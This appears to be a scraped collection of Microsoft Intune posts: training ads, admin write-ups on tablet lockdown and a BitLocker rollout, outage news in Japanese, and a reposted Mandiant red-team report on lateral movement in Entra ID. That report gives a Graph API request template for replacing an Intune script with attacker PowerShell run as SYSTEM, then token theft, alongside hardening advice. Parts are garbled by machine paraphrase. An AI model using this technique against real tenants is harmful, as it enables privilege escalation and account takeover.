Celebrate Diwali with Heavy Discount Offer IP4 Networkers

Curso Microsoft Intune en Madrid, Barcelona y Online

Formación MS Intune para consultores técnicos y profesionales de empresa que deseen aprender a administrar dispositivos móviles (MDM) en su organización. Curso Intune ofrecido en modalidad presencial In Company u online en Madrid, Barcelona, Valencia, Alicante, Málaga, Sevilla y Bilbao, bajo demanda para empresas.

Aprende todas las novedades en torno a MS Intune y prepárate para tu certificación.

¿Qué es Microsoft Intune?

Microsoft 365 Intune es un servicio basado en la nube especializado en la administración de dispositivos móviles (MDM) y aplicaciones móviles (MAM). Esta solución tecnológica de Microsoft nos permite controlar cómo se usan los dispositivos dentro de una organización o empresa, como los teléfonos móviles, los ordenadores portátiles o las tablets, además de establecer directivas específicas para controlar las aplicaciones de Office 365. De esta forma, podemos evitar que se envíen mensajes de correo electrónico a personas ajenas a la organización, así como ayudar a que los datos empresariales permanezcan protegidos incluso en los dispositivos y aplicaciones personales de los trabajadores.

Maintain the productivity of administrators and corporate users across all their devices, activate automated deployments to all Intune-managed devices with just a few clicks, and streamline remote administration and device management when support situations arise Microsoft Intune partner Key All features are there.

Entdecke Windows 365 Frontline

Entdecken Sie Windows 365 Frontline, die innovative Lösung von Microsoft, die speziell für Schicht- und Teilzeitkräfte entwickelt wurde. Erfahren Sie, wie Cloud-PCs die Arbeitswelt revolutionieren und flexible, sichere und effiziente Arbeitsmöglichkeiten.

Wie Microsoft die Bedürfnisse von Schicht- und Teilzeitkräften mit einer innovativen Lösung adressiert Hallo liebe Leserinnen und Leser! 👋 Habt ihr schon von der neuesten Innovation aus dem Hause Microsoft gehört? Es handelt sich um Windows 365 Frontline, eine bahnbrechende Lösung, die speziell auf die Bedürfnisse von Schicht- und Teilzeitkräften zugeschnitten ist.  In unserer zunehmend…

View On WordPress

O365 Security Overview

Office 365 is a popular cloud-based productivity suite that offers many benefits for businesses of all sizes. These Top 5 Security Settings in O365 should help you get started on your path towards a more secure cloud. However, with great power comes great responsibility. As an O365 administrator, you need to ensure that your organization’s data and users are protected from cyber threats and…

View On WordPress

Project lead lock down Samsung S7 Tablets using Intune Android Policy at Engitix

So part of the Cyber Essentials plus requirements was we had to lock down the scientist tablets from downloading unauthorised Google Play apps. The only apps that were authorised to be on the Samsung S7 tablets were Microsoft Office Suit (Word, Excel, Powerpoint, OneNote, OneDrive, Teams) and also Arduino Science Journal.

To do this I first created an Azure AD Group called ENG_AND_ALLOW

I then created an Android configuration profile I created profile called ENG_ALLOW_APPS. Once this was done I selected the Office 365 Apps and also Arduino Science Journal. Then I created the configuration profile.

Once this was done we decided to try a test tablet and add the test tablet to the ENG_AND_ALLOW group. Once we set this the configuration policy kicked in. We tried to download other Google Play apps but would not allow us. We tried to download only the office apps and Arduino Science Journal which worked fine.

We targeted 5 tablets a day and if there was an issue we could remove the tablet from the ENG_AND_ALLOW group which removed the policy.

Learn about Microsoft Security Copilot

Microsoft Security Copilot (Security Copilot) is a generative AI-powered security solution that helps increase the efficiency and capabilities of defenders to improve security outcomes at machine speed and scale, while remaining compliant to responsible AI principles. Introducing Microsoft Security Copilot: Learn how the Microsoft Security Copilot works. Learn how Security Copilot combines an…

View On WordPress

Simplifying Your IT Infrastructure with Microsoft Intune : Our Expertise at Your Service!

Microsoft Intune provides a solution to these critical challenges. The cloud-based management solution is designed to help businesses manage their IT infrastructure remotely.Learn to set up, manage, and monitor your IT infrastructure using Intune. Get started with top-notch Intune consulting.

https://blog.trndigital.com/simplifying-your-it-infrastructure-with-microsoft-intune-our-expertise-at-your-service

Application in Intune (for windows)?

How to add application in Intune? In this tutorial we want to learn how we can add Application in Intune (for windows)? To add an app in Microsoft Intune, you can follow these general steps: Sign into the Microsoft Endpoint Manager admin center (https://endpoint.microsoft.com) using your administrator account. Navigate to “Apps” from the left-hand menu. Click on “Add” to start the process of…

View On WordPress

Want to use Microsoft Intune to install Tux Paint on a large number of Windows boxes? Tux Paint's installer offers a "/SILENT" option to install without popping up an interactive window!

Microsoft Says 8.5 Million Windows Devices Impacted by CrowdStrike Incident, Publishes Recovery Tool

Source: https://www.securityweek.com/microsoft-says-8-5-million-windows-devices-impacted-by-crowdstrike-incident-publishes-recovery-tool/

More info: https://techcommunity.microsoft.com/t5/intune-customer-success/new-recovery-tool-to-help-with-crowdstrike-issue-impacting/ba-p/4196959

Microsoft Intune Partner

Technology Solutions Worldwide offers unparalleled expertise as a Microsoft Intune Partner, providing businesses with comprehensive mobile device management solutions. Our services ensure seamless integration, enhanced security, and streamlined operations for your organization. With Techsolworld.com, you gain access to tailored strategies that empower your workforce while safeguarding sensitive data. Experience the future of device management with our dedicated support and innovative solutions. For more information or to get started, please call us at 470-208-1024. For More Information: https://www.behance.net/gallery/221777783/Microsoft-Intune-Partner

Entra ID Lateral Movement And Expanding Permission Usage

Abusing Intimate Permissions for Lateral Movement and Privilege Escalation in Entra ID Native Environments: (In)tune to Takeovers

Recently, a client received assistance from the Mandiant Red Team in visualizing the potential consequences of an advanced threat actor breach. In order to compromise the tenant’s installed Entra ID service principals, Mandiant migrated laterally from the customer’s on-premises environment to their Microsoft Entra ID tenant during the evaluation.

Using a popular security architecture that involves Intune-managed Privileged Access Workstations (PAWs), we will discuss in this blog post a new method by which adversaries can move laterally and elevate privileges within Microsoft Entra ID by abusing Intune permissions (DeviceManagementConfiguration.ReadWrite.All) granted to Entra ID service principals. We also offer suggestions and corrective actions to stop and identify this kind of attack.

A pretext

The client had a well-developed security architecture that adhered to the Enterprise Access model suggested by Microsoft, which included:

An Active Directory-based on-premises setting that adheres to the Tiered Model.

A Microsoft Entra Connect Sync-synchronized Entra ID environment that synchronizes on-premises identities and groups with Entra ID. PAWs, which were completely cloud-native and controlled by Intune Mobile Device Management (MDM), were used to administrate this environment. They were not connected to the on-premises Active Directory system. To access these systems, IT managers used a specific, cloud-native (non-synced) administrative account. These cloud-native administrative accounts were the only ones allocated Entra ID roles (Global Administrator, Privileged Role Administrator, etc.).

A robust security barrier was created by separating administrative accounts, devices, and privileges between the Entra ID environment and the on-premises environment:

Because Entra ID privileged roles are associated with unique, cloud-native identities, a compromise of the on-premises Active Directory cannot be utilized to compromise the Entra ID environment. This is an excellent practice for Microsoft.

An “air gap” between the administration planes of the two environments is successfully created by using distinct physical workstations for administrative access to cloud and on-premises resources. Attackers find it very challenging to get through air gaps.

Strong Conditional Access regulations imposed by Privileged Identity Management assigned roles to the administrative accounts in Entra ID, necessitating multi-factor authentication and a managed, compliant device. Additionally, Microsoft recommends these best practices.

Attack Path

One of the objectives of the evaluation was to assign the Mandiant Red Team the task of obtaining Global Administrator access to the Entra ID tenant. Mandiant was able to add credentials to Entra ID service principals (microsoft.directory/servicePrincipals/credentials/update) by using a variety of methods that are outside the purview of this blog post. This gave the Red Team the ability to compromise any preloaded service principal.

There are a number well-known methods for abusing service principal rights to get higher permissions, most notably through the usage of RoleManagement.See AppRoleAssignment and ReadWrite.Directory.Application and ReadWrite.All.ReadWrite.All rights for Microsoft Graph.

However, the Mandiant Red Team had to reconsider their approach because none of these rights were being used in the customer’s environment.

Mandiant found a service principle that was given the DeviceManagementConfiguration after using the superb ROADTools framework to learn more about the customer’s Entra ID system.Go ahead and write.Permission is granted.Image credit to Google Cloud

The service principal is able to “read and write Microsoft Intune device configuration and policies” with this authorization.

Clients running Windows 10 and later can execute the unique PowerShell scripts used by Intune for device management. Administrators have an alternative to configuring devices with settings not accessible through the configuration policies or the apps section of Intune by using the ability to run scripts on local devices. When the device boots up, management scripts with administrator rights (NT AUTHORITY\SYSTEM) are run.

The configuration of Device Management.Go ahead and write.To list, read, create, and update management scripts via the Microsoft Graph API, all permissions are required.

The Microsoft Graph API makes it simple to write or edit the management script. An example HTTP request to alter an existing script is displayed in the accompanying figure.PATCH https://graph.microsoft.com/beta/deviceManagement/ deviceManagementScripts/<script id> { "@odata.type": "#microsoft.graph.deviceManagementScript", "displayName": "<display name>", "description": "<description>", "scriptContent": "<PowerShell script in base64 encoding>", "runAsAccount": "system", "enforceSignatureCheck": false, "fileName": "<filename>", "roleScopeTagIds": [ "<existing role scope tags>" ], "runAs32Bit": false }

The caller can provide a display name, file name, and description in addition to the Base64-encoded value of the PowerShell script content using the Graph API. Depending on which principle the script should be run as, the runAsAccount parameter can be set to either user or system. RoleScopeTagIds references Intune’s Scope Tags, which associate people and devices. The DeviceManagementConfiguration can likewise be used to construct and manage them.Go ahead and write. Permission is granted.

The configuration of Device Management.Go ahead and write.By changing an existing device management script to run a PowerShell script under Mandiant’s control, Mandiant was able to go laterally to the PAWs used for Entra ID administration with full authorization. The malicious script is run by the Intune management script when the device reboots as part of the user’s regular workday.

By implanting a command-and-control device, Mandiant could give the PAWs any instructions. The Red Team obtained privileged access to Entra ID by waiting for the victim to activate their privileged role through Azure Privileged Identity Management and then impersonating the privileged account (for example, by stealing cookies or tokens). By taking these actions, Mandiant was able to fulfill the assessment’s goal and gain Global Administrator rights in Entra ID.

Remediation and Recommendations

To avoid the attack scenario, Mandiant suggests the following hardening measures:

Review your organization’s security principals for the DeviceManagementConfiguration.ReadWrite.All permission:  DeviceManagementConfiguration should be handled by organizations that use Microsoft Intune for device management.Go ahead and write.Since it grants the trustee authority over the Intune-managed devices and, consequently, any identities connected to the devices, all permissions are considered sensitive.

Mandiant advises businesses to routinely check the authorizations given to Azure service principals, with a focus on the DeviceManagementConfiguration.Along with other sensitive permissions (like RoleManagement), there is the ReadWrite.All permission.See AppRoleAssignment and ReadWrite.Directory.Application and ReadWrite.All.ReadWrite.All.

Businesses that manage PAWs with Intune should exercise extra caution when assigning Intune privileges (either via DeviceManagementConfiguration).Use Entra roles like Intune Role Administrator or ReadWrite.All.

Enable Intune’s multiple admin approval: Intune allows you to use Access Policies to demand a second administrator’s approval before applying any changes. By doing this, an attacker would be unable to use a single compromised account to create or alter management scripts.

Think about turning on activity logs for the Microsoft Graph API: Graph API Activity logs, which provide comprehensive details about Graph API HTTP requests made to Microsoft Graph resources, can be enabled to aid in detection and response efforts.

Make use of the features that Workload ID Premium licenses offer: With a Workload-ID Premium license, Mandiant suggests using these features to:

Limit the use of privileged service principals to known, reliable places only. By guaranteeing that only trustworthy places are used, this reduces the possibility of unwanted access and improves security.

Enable risk detections in Microsoft Identity Protection to improve service principal security. When risk factors or questionable activity are found, this can proactively prohibit access.

Keep an eye on service principal sign-ins proactively: Monitoring service principal sign-ins proactively can aid in identifying irregularities and possible dangers. Incorporate this information into security procedures to set off notifications and facilitate quick action in the event of unwanted access attempts.

Mandiant has a thorough grasp of the various ways attackers may compromise their target’s cloud estate with some hostile emulation engagements, Red Team Assessments, and Purple Team Assessments.

Read more on Govindhtech.com

7 月 30 日 10:14 EDT 更新 : Microsoft は、この障害が Microsoft 365 管理センター、Intune、Entra、Power BI、および Power Platform サービスに影響を与えたことを確認しました。 また、SharePoint Online、OneDrive for Business、Microsoft Teams、Exchange Onlineは影響を受けないとも付け加えた。 「影響を受ける Microsoft 365 サービスにアクセスできるユーザーは、遅延や機能パフォーマン���の低下が発生する可能性があります」と Microsoft はサービスの正常性ステータスのページで説明しています。 「私たちは調査を支援するために、ネットワーク インフラストラクチャのセクション内のトラフィック ��ターンを分析しています。さらに、被害を軽減するために潜在的なフェイルオーバーを含む緩和オプションを検討しています。」 更新 7 月 30 日 11:15 EDT : Microsoft は、ネットワーク構成の変更後、サービスの可用性が向上していると述べています。 「ネットワーク構成の変更を実施し、一部の Microsoft 365 サービスは代替ネットワーク パスへのフェールオーバーを実行して、問題を軽減しました」と同社は 述べています 。 「テレメトリーの監視により、サービスの可用性が向上していることが示されており、完全な回復を確実にするために監視を続けています。」 更新 7 月 30 日 14:14 EDT : Microsoft は 、障害は「予期せぬ使用量の急増」によって引き起こされたと発表しており 、「その結果、Azure Front Door (AFD) および Azure Content Delivery Network (CDN) コンポーネントのパフォーマンスが許容可能なしきい値を下回り、断続的なエラーが発生しました」 、タイムアウト、レイテンシーのスパイク。」 「当社はこれらの副作用を最小限に抑えるために軽減策を更新し、安全な導入慣行に従ってこれらを適用しています。アジア太平洋地域から始めて段階的に拡大していきます。」と同社は付け加えた。 更新 7 月 30 日 16:54 EDT : Microsoft は、「大多数の顧客とサービスは完全に軽減されている」と述べ、同社のエンジニアは「復旧を検証する最終段階にある」と述べています。

Microsoft 365 と Azure の停止により複数のサービスが停止

Deploy Bitlocker using Endpoint Manager for VCCP

So part of the ISO 27001 the business had made a decision that all Windows laptops should be encrypted with Bitlocker and all Macs will be encrypted with Filevault. I was brought in as the lead for all Windows laptop devices. We had 630 windows laptops we had to roll out Bitlocker to. All these laptops were autopilot enrolled already into Endpoint Manager. 

First thing we had to do was check that all Windows 10 operating systems were on the 1809 version as any versions below this would cause issues. To do this we sent an email to all users to do a windows update over the weekend the service desk guys then would check of in Endpoint Manger to confirm they are on the latest build. Any users that were not the service desk guys would chase the user and do the update for them.

Once the checks were completed by the service desk and the laptops were in place. I first created the Endpoint Manager policy and used the endpoint protection policy. 

We used the following settings for the policy. 

-Set Encrypt Devices 

-Allow the users to enable encryption during AAD join. 

-Configure encryption method (We went with the default of XTS-AES 256 bit) 

-We set the fixed drive recovery and enabled the store recovery information in Azure Active Directory. (This is so that bitlocker keys would auto enroll in Azure Active Directory)

-We blocked the bitlocker removable storage (This is so a 3rd Party cannot take the drive and decrypt it)

Once the policy was created I created an Azure AD Group and called it Win10 Bitlocker and I assigned the Windows 10 Bitlocker Policy to the Azure AD Windows 10 Bitlocker group. 

We then decided to select about 10 windows devices from users in separate departments and assigned their devices to the Win10 Bitlocker group. Once this was done I would run a sync to push the policy onto the laptop. 

The next day I would check that the policy has applied to the device successfully. Service desk would check to see if the drive has been encrypted to see if there is a lock against the drive. If it has been encrypted they would also check in Azure AD to see that the Bitlocker key is there. If the drive is not encrypted then they would force it from the client side by running a sync. 

This process took over 3 months to encrypt all laptops with bitlocker and the key in Azure AD ready to use if we need to decrypt the hard drive. 

Fallback 

In stock we kept a total of 50 HP G8 laptops with Windows 10 that were ready to go if there was an issue with the users laptop and drives and we could swap out the laptop. 

Issues faced 

TPM on HP Pavilion G6

So one issue faced was the TPM chip on the HP G6 laptop were to old and would not work with the deployment of Bitlocker via Endpoint manager. We could have just encrypted these drives manually then store the bitlocker key in Azure AD but we decided to swap these laptops out with HP G8 laptops during the process.

Bitlocker drive could not be applied 

So we had it on a handful of devices in the past where group policies were managing the device but then it stores the following registry key on the local machine 

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\FVE

To get around this service desk would delete the key and run a synch manually from the client machine which fixed the issue.